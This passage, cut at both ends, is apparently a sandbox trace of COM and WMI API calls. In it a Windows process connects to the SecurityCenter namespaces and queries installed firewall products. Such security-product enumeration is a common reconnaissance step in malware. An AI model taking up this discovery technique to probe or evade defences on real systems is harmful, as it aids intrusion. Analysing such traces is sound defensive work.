riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f21c | out: ppv=0x36f21c*=0x6ee4bc) returned 0x0 [0215.729] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f214 | out: pAptType=0x36f214*=1) returned 0x0 [0215.729] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f218 | out: ppvObject=0x36f218*=0x0) returned 0x80004002 [0215.729] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0215.730] CoGetClassObject (in: rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ee38 | out: ppv=0x36ee38*=0x5e8d9a0) returned 0x0 [0215.730] WbemLocator:IUnknown:QueryInterface (in: This=0x5e8d9a0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36f050 | out: ppvObject=0x36f050*=0x0) returned 0x80004002 [0215.730] WbemLocator:IClassFactory:CreateInstance (in: This=0x5e8d9a0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f05c | out: ppvObject=0x36f05c*=0x5e89210) returned 0x0 [0215.730] WbemLocator:IUnknown:Release (This=0x5e8d9a0) returned 0x0 [0215.730] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89210, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ec7c | out: ppvObject=0x36ec7c*=0x5e89210) returned 0x0 [0215.730] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89210, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ec30 | out: ppvObject=0x36ec30*=0x0) returned 0x80004002 [0215.731] WbemLocator:IUnknown:AddRef (This=0x5e89210) returned 0x3 [0215.731] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89210, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e58c | out: ppvObject=0x36e58c*=0x0) returned 0x80004002 [0215.731] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89210, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e53c | out: ppvObject=0x36e53c*=0x0) returned 0x80004002 [0215.731] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89210, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e548 | out: ppvObject=0x36e548*=0x0) returned 0x80004002 [0215.731] CoGetContextToken (in: pToken=0x36e5a8 | out: pToken=0x36e5a8) returned 0x0 [0215.731] CoGetContextToken (in: pToken=0x36e9bc | out: pToken=0x36e9bc) returned 0x0 [0215.731] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89210, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea3c | out: ppvObject=0x36ea3c*=0x0) returned 0x80004002 [0215.731] WbemLocator:IUnknown:Release (This=0x5e89210) returned 0x2 [0215.731] WbemLocator:IUnknown:Release (This=0x5e89210) returned 0x1 [0215.731] CoGetContextToken (in: pToken=0x36f03c | out: pToken=0x36f03c) returned 0x0 [0215.731] CoGetContextToken (in: pToken=0x36ef9c | out: pToken=0x36ef9c) returned 0x0 [0215.731] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89210, riid=0x36f06c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f068 | out: ppvObject=0x36f068*=0x5e89210) returned 0x0 [0215.731] WbemLocator:IUnknown:AddRef (This=0x5e89210) returned 0x3 [0215.731] WbemLocator:IUnknown:Release (This=0x5e89210) returned 0x2 [0215.731] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768eb8, puCount=0x36f1f8 | out: puCount=0x36f1f8*=0x2) returned 0x0 [0215.731] WbemDefPath:IWbemPath:GetText (in: This=0x768eb8, lFlags=8, puBuffLength=0x36f1f4*=0x0, pszText=0x0 | out: puBuffLength=0x36f1f4*=0x18, pszText=0x0) returned 0x0 [0215.731] WbemDefPath:IWbemPath:GetText (in: This=0x768eb8, lFlags=8, puBuffLength=0x36f1f4*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f1f4*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.731] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f090 | out: ppv=0x36f090*=0x5e891f0) returned 0x0 [0215.732] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e891f0, strNetworkResource="\\\\.\\ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f144 | out: ppNamespace=0x36f144*=0x792f68) returned 0x0 [0215.805] WbemLocator:IUnknown:QueryInterface (in: This=0x792f68, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efb4 | out: ppvObject=0x36efb4*=0x784fd4) returned 0x0 [0215.805] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x784fd4, pProxy=0x792f68, pAuthnSvc=0x36f004, pAuthzSvc=0x36f000, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc, pImpLevel=0x36efec, pAuthInfo=0x36eff0, pCapabilites=0x36eff4 | out: pAuthnSvc=0x36f004*=0xa, pAuthzSvc=0x36f000*=0x0, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc*=0x6, pImpLevel=0x36efec*=0x2, pAuthInfo=0x36eff0, pCapabilites=0x36eff4*=0x1) returned 0x0 [0215.805] WbemLocator:IUnknown:Release (This=0x784fd4) returned 0x1 [0215.805] WbemLocator:IUnknown:QueryInterface (in: This=0x792f68, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efa8 | out: ppvObject=0x36efa8*=0x784ff4) returned 0x0 [0215.805] WbemLocator:IUnknown:QueryInterface (in: This=0x792f68, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef94 | out: ppvObject=0x36ef94*=0x784fd4) returned 0x0 [0215.805] WbemLocator:IClientSecurity:SetBlanket (This=0x784fd4, pProxy=0x792f68, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.806] WbemLocator:IUnknown:Release (This=0x784fd4) returned 0x2 [0215.806] WbemLocator:IUnknown:Release (This=0x784ff4) returned 0x1 [0215.806] CoTaskMemFree (pv=0x793fa8) [0215.806] WbemLocator:IUnknown:AddRef (This=0x792f68) returned 0x2 [0215.806] WbemLocator:IUnknown:Release (This=0x5e891f0) returned 0x0 [0215.807] CoGetContextToken (in: pToken=0x36e4e8 | out: pToken=0x36e4e8) returned 0x0 [0215.807] CoGetContextToken (in: pToken=0x36e8fc | out: pToken=0x36e8fc) returned 0x0 [0215.807] WbemLocator:IUnknown:QueryInterface (in: This=0x792f68, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e894 | out: ppvObject=0x36e894*=0x784fdc) returned 0x0 [0215.807] WbemLocator:IRpcOptions:Query (in: This=0x784fdc, pPrx=0x5e8d9e8, dwProperty=2, pdwValue=0x36e988 | out: pdwValue=0x36e988) returned 0x80004002 [0215.807] WbemLocator:IUnknown:Release (This=0x784fdc) returned 0x2 [0215.807] CoGetContextToken (in: pToken=0x36eecc | out: pToken=0x36eecc) returned 0x0 [0215.807] CoGetContextToken (in: pToken=0x36ee2c | out: pToken=0x36ee2c) returned 0x0 [0215.807] WbemLocator:IUnknown:QueryInterface (in: This=0x792f68, riid=0x36eefc*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36edc8 | out: ppvObject=0x36edc8*=0x792f68) returned 0x0 [0215.807] WbemLocator:IUnknown:Release (This=0x792f68) returned 0x2 [0215.807] SysStringLen (param_1=0x0) returned 0x0 [0215.807] CoGetContextToken (in: pToken=0x36effc | out: pToken=0x36effc) returned 0x0 [0215.807] IWbemServices:ExecQuery (in: This=0x792f68, strQueryLanguage="WQL", strQuery="SELECT * FROM FirewallProduct", lFlags=16, pCtx=0x0, ppEnum=0x36f204 | out: ppEnum=0x36f204*=0x70f928) returned 0x0 [0215.810] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f060 | out: ppvObject=0x36f060*=0x70f92c) returned 0x0 [0215.810] IClientSecurity:QueryBlanket (in: This=0x70f92c, pProxy=0x70f928, pAuthnSvc=0x36f0b0, pAuthzSvc=0x36f0ac, pServerPrincName=0x36f0a4, pAuthnLevel=0x36f0a8, pImpLevel=0x36f098, pAuthInfo=0x36f09c, pCapabilites=0x36f0a0 | out: pAuthnSvc=0x36f0b0*=0xa, pAuthzSvc=0x36f0ac*=0x0, pServerPrincName=0x36f0a4, pAuthnLevel=0x36f0a8*=0x6, pImpLevel=0x36f098*=0x2, pAuthInfo=0x36f09c, pCapabilites=0x36f0a0*=0x1) returned 0x0 [0215.810] IUnknown:Release (This=0x70f92c) returned 0x1 [0215.810] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f054 | out: ppvObject=0x36f054*=0x784a54) returned 0x0 [0215.811] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f040 | out: ppvObject=0x36f040*=0x70f92c) returned 0x0 [0215.811] IClientSecurity:SetBlanket (This=0x70f92c, pProxy=0x70f928, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.812] IUnknown:Release (This=0x70f92c) returned 0x2 [0215.812] WbemLocator:IUnknown:Release (This=0x784a54) returned 0x1 [0215.812] CoTaskMemFree (pv=0x794068) [0215.812] IUnknown:AddRef (This=0x70f928) returned 0x2 [0215.813] CoGetContextToken (in: pToken=0x36e580 | out: pToken=0x36e580) returned 0x0 [0215.813] CoGetContextToken (in: pToken=0x36e994 | out: pToken=0x36e994) returned 0x0 [0215.813] IUnknown:QueryInterface (in: This=0x70f928, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e92c | out: ppvObject=0x36e92c*=0x784a3c) returned 0x0 [0215.813] WbemLocator:IRpcOptions:Query (in: This=0x784a3c, pPrx=0x5e8d9b8, dwProperty=2, pdwValue=0x36ea20 | out: pdwValue=0x36ea20) returned 0x80004002 [0215.813] WbemLocator:IUnknown:Release (This=0x784a3c) returned 0x2 [0215.813] CoGetContextToken (in: pToken=0x36ef64 | out: pToken=0x36ef64) returned 0x0 [0215.813] CoGetContextToken (in: pToken=0x36eec4 | out: pToken=0x36eec4) returned 0x0 [0215.813] IUnknown:QueryInterface (in: This=0x70f928, riid=0x36ef94*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ee60 | out: ppvObject=0x36ee60*=0x70f928) returned 0x0 [0215.813] IUnknown:Release (This=0x70f928) returned 0x2 [0215.813] SysStringLen (param_1=0x0) returned 0x0 [0215.814] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768eb8, puCount=0x36f250 | out: puCount=0x36f250*=0x2) returned 0x0 [0215.814] WbemDefPath:IWbemPath:GetText (in: This=0x768eb8, lFlags=4, puBuffLength=0x36f24c*=0x0, pszText=0x0 | out: puBuffLength=0x36f24c*=0x18, pszText=0x0) returned 0x0 [0215.814] WbemDefPath:IWbemPath:GetText (in: This=0x768eb8, lFlags=4, puBuffLength=0x36f24c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f24c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.814] CoGetContextToken (in: pToken=0x36f0a4 | out: pToken=0x36f0a4) returned 0x0 [0215.814] IEnumWbemClassObject:Clone (in: This=0x70f928, ppEnum=0x36f25c | out: ppEnum=0x36f25c*=0x70f9f0) returned 0x0 [0215.815] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f118 | out: ppvObject=0x36f118*=0x70f9f4) returned 0x0 [0215.815] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f168, pAuthzSvc=0x36f164, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160, pImpLevel=0x36f150, pAuthInfo=0x36f154, pCapabilites=0x36f158 | out: pAuthnSvc=0x36f168*=0xa, pAuthzSvc=0x36f164*=0x0, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160*=0x6, pImpLevel=0x36f150*=0x2, pAuthInfo=0x36f154, pCapabilites=0x36f158*=0x1) returned 0x0 [0215.815] IUnknown:Release (This=0x70f9f4) returned 0x1 [0215.815] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f10c | out: ppvObject=0x36f10c*=0x7851d4) returned 0x0 [0215.815] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0f8 | out: ppvObject=0x36f0f8*=0x70f9f4) returned 0x0 [0215.815] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.817] IUnknown:Release (This=0x70f9f4) returned 0x2 [0215.817] WbemLocator:IUnknown:Release (This=0x7851d4) returned 0x1 [0215.817] CoTaskMemFree (pv=0x794098) [0215.817] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0215.817] CoGetContextToken (in: pToken=0x36e628 | out: pToken=0x36e628) returned 0x0 [0215.817] CoGetContextToken (in: pToken=0x36ea3c | out: pToken=0x36ea3c) returned 0x0 [0215.817] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9d4 | out: ppvObject=0x36e9d4*=0x7851bc) returned 0x0 [0215.817] WbemLocator:IRpcOptions:Query (in: This=0x7851bc, pPrx=0x5e8da78, dwProperty=2, pdwValue=0x36eac8 | out: pdwValue=0x36eac8) returned 0x80004002 [0215.817] WbemLocator:IUnknown:Release (This=0x7851bc) returned 0x2 [0215.817] CoGetContextToken (in: pToken=0x36f00c | out: pToken=0x36f00c) returned 0x0 [0215.818] CoGetContextToken (in: pToken=0x36ef6c | out: pToken=0x36ef6c) returned 0x0 [0215.818] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36f03c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ef08 | out: ppvObject=0x36ef08*=0x70f9f0) returned 0x0 [0215.818] IUnknown:Release (This=0x70f9f0) returned 0x2 [0215.818] SysStringLen (param_1=0x0) returned 0x0 [0215.818] IEnumWbemClassObject:Reset (This=0x70f9f0) returned 0x0 [0215.819] CoTaskMemAlloc (cb=0x4) returned 0x5e89280 [0215.819] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89280, puReturned=0x246b8c4 | out: apObjects=0x5e89280*=0x0, puReturned=0x246b8c4*=0x0) returned 0x1 [0215.820] CoTaskMemFree (pv=0x5e89280) [0215.820] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0215.820] IUnknown:Release (This=0x70f9f0) returned 0x1 [0215.820] IUnknown:Release (This=0x70f9f0) returned 0x0 [0215.821] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0215.821] IUnknown:Release (This=0x70f928) returned 0x1 [0215.821] IUnknown:Release (This=0x70f928) returned 0x0 [0215.822] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f278 | out: ppv=0x36f278*=0x6ee4bc) returned 0x0 [0215.822] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f270 | out: pAptType=0x36f270*=1) returned 0x0 [0215.822] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f274 | out: ppvObject=0x36f274*=0x0) returned 0x80004002 [0215.822] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0215.823] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ebe0 | out: ppv=0x36ebe0*=0x5e89280) returned 0x0 [0215.823] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89280, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36edf8 | out: ppvObject=0x36edf8*=0x0) returned 0x80004002 [0215.823] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89280, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ee04 | out: ppvObject=0x36ee04*=0x768f28) returned 0x0 [0215.823] WbemDefPath:IUnknown:Release (This=0x5e89280) returned 0x0 [0215.823] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f28, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea24 | out: ppvObject=0x36ea24*=0x768f28) returned 0x0 [0215.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f28, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e9d8 | out: ppvObject=0x36e9d8*=0x0) returned 0x80004002 [0215.824] WbemDefPath:IUnknown:AddRef (This=0x768f28) returned 0x3 [0215.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f28, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e334 | out: ppvObject=0x36e334*=0x0) returned 0x80004002 [0215.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f28, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e2e4 | out: ppvObject=0x36e2e4*=0x0) returned 0x80004002 [0215.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f28, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e2f0 | out: ppvObject=0x36e2f0*=0x5e89240) returned 0x0 [0215.824] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89240, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e2f8 | out: pCid=0x36e2f8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0215.824] WbemDefPath:IUnknown:Release (This=0x5e89240) returned 0x3 [0215.824] CoGetContextToken (in: pToken=0x36e350 | out: pToken=0x36e350) returned 0x0 [0215.824] CoGetContextToken (in: pToken=0x36e764 | out: pToken=0x36e764) returned 0x0 [0215.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f28, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e7e4 | out: ppvObject=0x36e7e4*=0x0) returned 0x80004002 [0215.824] WbemDefPath:IUnknown:Release (This=0x768f28) returned 0x2 [0215.824] WbemDefPath:IUnknown:Release (This=0x768f28) returned 0x1 [0215.824] CoGetContextToken (in: pToken=0x36f0fc | out: pToken=0x36f0fc) returned 0x0 [0215.824] CoGetContextToken (in: pToken=0x36f05c | out: pToken=0x36f05c) returned 0x0 [0215.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f28, riid=0x36f12c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f128 | out: ppvObject=0x36f128*=0x768f28) returned 0x0 [0215.825] WbemDefPath:IUnknown:AddRef (This=0x768f28) returned 0x3 [0215.825] WbemDefPath:IUnknown:Release (This=0x768f28) returned 0x2 [0215.825] WbemDefPath:IWbemPath:SetText (This=0x768f28, uMode=0x4, pszPath="ROOT\\SecurityCenter2") returned 0x0 [0215.825] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f28, puCount=0x36f2a0 | out: puCount=0x36f2a0*=0x2) returned 0x0 [0215.825] WbemDefPath:IWbemPath:GetText (in: This=0x768f28, lFlags=4, puBuffLength=0x36f29c*=0x0, pszText=0x0 | out: puBuffLength=0x36f29c*=0x19, pszText=0x0) returned 0x0 [0215.825] WbemDefPath:IWbemPath:GetText (in: This=0x768f28, lFlags=4, puBuffLength=0x36f29c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f29c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0215.825] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f28, puCount=0x36f28c | out: puCount=0x36f28c*=0x2) returned 0x0 [0215.825] WbemDefPath:IWbemPath:GetText (in: This=0x768f28, lFlags=4, puBuffLength=0x36f288*=0x0, pszText=0x0 | out: puBuffLength=0x36f288*=0x19, pszText=0x0) returned 0x0 [0215.825] WbemDefPath:IWbemPath:GetText (in: This=0x768f28, lFlags=4, puBuffLength=0x36f288*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f288*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0215.825] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f21c | out: ppv=0x36f21c*=0x6ee4bc) returned 0x0 [0215.825] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f214 | out: pAptType=0x36f214*=1) returned 0x0 [0215.825] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f218 | out: ppvObject=0x36f218*=0x0) returned 0x80004002 [0215.825] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0215.826] CoGetClassObject (in: 